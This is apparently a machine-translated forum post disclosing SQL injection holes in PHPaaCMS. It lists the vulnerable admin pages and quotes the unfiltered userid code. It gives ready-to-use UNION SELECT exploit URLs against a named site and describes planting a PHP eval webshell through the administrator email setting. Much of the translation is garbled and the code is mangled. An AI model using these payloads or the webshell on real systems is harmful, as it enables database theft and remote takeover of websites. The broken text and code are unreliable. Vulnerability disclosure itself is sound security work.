A vulnerability called Brother Fei. A lot of holes have been exposed. Er, I used to think PHPaa is safe. Why can't Daniel see it? I like injection. Let's just inject it. Others are Baidu. Vulnerability file: adminpage. add. phpadminmessage. action. phpadminarticle. add. phpsearch. php $ use
A vulnerability called Brother Fei. A lot of holes have been exposed. Er, I used to thinkPHPAa is safe.
Why can't Daniel see it? I like injection. Let's just inject it. Other Baidu
.
Vulnerability files:
Admin/page.Dd.Php
Admin/message. action. php
Admin/article. add. php
Search. php
$ UserId=TrIm ($ _ GET ['userid'])? Trim ($ _ GET ['userid']): 0; // only spaces are filtered
Find("Select * from phpaadb_users where userid =". $ userid );
The above three pages are caused by lax filtering of userids.
Use EXP:
http://www.tmdsb.com/admin/friendlink.add.php?act=edit&id=1%20and%201=2%20union%20select%201,2,3,user%28%29,5,6 |
http://www.tmdsb.com/phpaaCMS/admin/user.add.php?act=edit,&userid=31 union select 1,user(),3 |
http://www.tmdsb.com/admin/article.add.php?act=add&cid=1&id=32%27 |
The webshell method is as follows:
Attackers use the Administrator's account and password to log on to the background. Then there is an administrator email address in the website configuration area. Direct
Write a sentence:/")?>
Eval($ _ POST [tmd] // |
Connect to a website. INc. Php